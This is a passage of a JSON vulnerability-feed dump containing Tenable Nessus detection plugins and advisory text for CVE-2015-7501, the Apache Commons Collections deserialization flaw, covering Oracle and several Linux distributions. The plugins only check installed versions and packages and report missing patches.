vulnerability due to unsafe deserialize calls of unauthenticated Java objects to the Apache Commons Collections (ACC) library. An unauthenticated, remote attacker can exploit this, by sending a crafted SOAP request, to execute arbitrary code on the target host.", "cvss3": {}, "published": "2016-05-03T00:00:00", "type": "nessus", "title": "Oracle Application Testing Suite Java Object Deserialization RCE (April 2016 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:application_testing_suite"], "id": "ORACLE_OATS_CPU_APR_2016.NASL", "href": "https://www.tenable.com/plugins/nessus/90859", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90859);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_bugtraq_id(78215);\n script_xref(name:\"CERT\", value:\"576313\");\n\n script_name(english:\"Oracle Application Testing Suite Java Object Deserialization RCE (April 2016 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a web application installed that is affected by a\nremote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle Application Testing Suite installed on the\nremote host is affected by a remote code execution vulnerability due\nto unsafe deserialize calls of unauthenticated Java objects to the\nApache Commons Collections (ACC) library. An unauthenticated, remote\nattacker can exploit this, by sending a crafted SOAP request, to\nexecute arbitrary code on the target host.\");\n # https://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ffb7b96f\");\n # https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9c6d83db\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2016 Oracle\nCritical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7501\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:application_testing_suite\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_application_testing_suite_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Application Testing Suite\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"install_func.inc\");\n\napp_name = \"Oracle Application Testing Suite\";\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nohome = install[\"Oracle Home\"];\nsubdir = install[\"path\"];\nversion = install[\"version\"];\n\nfix = NULL;\nfix_ver = NULL;\n\n# individual security patches\nif (version =~ \"^12\\.5\\.0\\.2\\.\")\n{\n fix_ver = \"12.5.0.2.605\";\n fix = \"23012288\";\n}\nelse if (version =~ \"^12\\.4\\.0\\.2\\.\")\n{\n fix_ver = \"12.4.0.2.250\";\n fix = \"23012275\";\n}\n\nif (!isnull(fix_ver) && ver_compare(ver:version, fix:fix_ver, strict:FALSE) == -1)\n{\n port = 0;\n if (report_verbosity > 0)\n {\n report =\n '\\n Oracle home : ' + ohome +\n '\\n Install path : ' + subdir +\n '\\n Version : ' + version +\n '\\n Required patch : ' + fix +\n '\\n';\n security_hole(extra:report, port:port);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:44:38", "description": "Updated jakarta-commons-collections packages that fix one security issue are now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new interfaces, implementations, and utilities to extend the features of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. All running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-11-30T00:00:00", "type": "nessus", "title": "RHEL 6 : jakarta-commons-collections (RHSA-2015:2521)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections", "p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-javadoc", "p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-testframework", "p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-testframework-javadoc", "p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-tomcat5", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.7"], "id": "REDHAT-RHSA-2015-2521.NASL", "href": "https://www.tenable.com/plugins/nessus/87102", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2521. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87102);\n script_version(\"2.19\");\n script_cvs_date(\"Date: 2019/10/24 15:35:40\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2521\");\n\n script_name(english:\"RHEL 6 : jakarta-commons-collections (RHSA-2015:2521)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated jakarta-commons-collections packages that fix one security\nissue are now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new\ninterfaces, implementations, and utilities to extend the features of\nthe Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that\nrequire those classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to\nthese updated packages, which contain a backported patch to correct\nthis issue. All running applications using the commons-collections\nlibrary must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/solutions/2045023\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:2521\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7501\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:2521\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"jakarta-commons-collections-3.2.1-3.5.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"jakarta-commons-collections-javadoc-3.2.1-3.5.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"jakarta-commons-collections-testframework-3.2.1-3.5.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"jakarta-commons-collections-testframework-javadoc-3.2.1-3.5.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"jakarta-commons-collections-tomcat5-3.2.1-3.5.el6_7\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-collections / jakarta-commons-collections-javadoc / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:45:16", "description": "It was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons- collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons- collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nIn the interim, the quickest way to resolve this specific deserialization vulnerability is to remove the vulnerable class files (InvokerTransformer, InstantiateFactory, and InstantiateTransformer) in all commons-collections jar files. Any manual changes should be tested to avoid unforseen complications.\n\nAll running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : apache-commons-collections on SL7.x (noarch) (20151130)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:apache-commons-collections", "p-cpe:/a:fermilab:scientific_linux:apache-commons-collections-javadoc", "p-cpe:/a:fermilab:scientific_linux:apache-commons-collections-testframework", "p-cpe:/a:fermilab:scientific_linux:apache-commons-collections-testframework-javadoc", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20151130_APACHE_COMMONS_COLLECTIONS_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/87120", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87120);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-7501\");\n\n script_name(english:\"Scientific Linux Security Update : apache-commons-collections on SL7.x (noarch) (20151130)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons- collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-\ncollections library is no longer allowed. Applications that require\nthose classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nIn the interim, the quickest way to resolve this specific\ndeserialization vulnerability is to remove the vulnerable class files\n(InvokerTransformer, InstantiateFactory, and InstantiateTransformer)\nin all commons-collections jar files. Any manual changes should be\ntested to avoid unforseen complications.\n\nAll running applications using the commons-collections library must be\nrestarted for the update to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1511&L=scientific-linux-errata&F=&S=&P=17483\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4e414258\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:apache-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:apache-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:apache-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:apache-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", reference:\"apache-commons-collections-3.2.1-22.el7_2\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"apache-commons-collections-javadoc-3.2.1-22.el7_2\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"apache-commons-collections-testframework-3.2.1-22.el7_2\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"apache-commons-collections-testframework-javadoc-3.2.1-22.el7_2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache-commons-collections / apache-commons-collections-javadoc / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:46:16", "description": "Updated apache-commons-collections packages that fix one security issue are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Apache Commons Collections library provides new interfaces, implementations, and utilities to extend the features of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of apache-commons-collections are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. All running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-02T00:00:00", "type": "nessus", "title": "CentOS 7 : apache-commons-collections (CESA-2015:2522)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:apache-commons-collections", "p-cpe:/a:centos:centos:apache-commons-collections-javadoc", "p-cpe:/a:centos:centos:apache-commons-collections-testframework", "p-cpe:/a:centos:centos:apache-commons-collections-testframework-javadoc", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2015-2522.NASL", "href": "https://www.tenable.com/plugins/nessus/87161", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2522 and \n# CentOS Errata and Security Advisory 2015:2522 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87161);\n script_version(\"2.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2522\");\n\n script_name(english:\"CentOS 7 : apache-commons-collections (CESA-2015:2522)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated apache-commons-collections packages that fix one security\nissue are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Apache Commons Collections library provides new interfaces,\nimplementations, and utilities to extend the features of the Java\nCollections Framework.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that\nrequire those classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of apache-commons-collections are advised to upgrade to\nthese updated packages, which contain a backported patch to correct\nthis issue. All running applications using the commons-collections\nlibrary must be restarted for the update to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-cr-announce/2015-December/002725.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b562fa0b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache-commons-collections packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7501\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:apache-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:apache-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:apache-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:apache-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"apache-commons-collections-3.2.1-22.el7_2\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"apache-commons-collections-javadoc-3.2.1-22.el7_2\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"apache-commons-collections-testframework-3.2.1-22.el7_2\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"apache-commons-collections-testframework-javadoc-3.2.1-22.el7_2\")) flag++;\n\n\nif (flag)\n{\n cr_plugin_caveat = '\\n' +\n 'NOTE: The security advisory associated with this vulnerability has a\\n' +\n 'fixed package version that may only be available in the continuous\\n' +\n 'release (CR) repository for CentOS, until it is present in the next\\n' +\n 'point release of CentOS.\\n\\n' +\n\n 'If an equal or higher package level does not exist in the baseline\\n' +\n 'repository for your major version of CentOS, then updates from the CR\\n' +\n 'repository will need to be applied in order to address the\\n' +\n 'vulnerability.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + cr_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache-commons-collections / apache-commons-collections-javadoc / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:44:57", "description": "From Red Hat Security Advisory 2015:2522 :\n\nUpdated 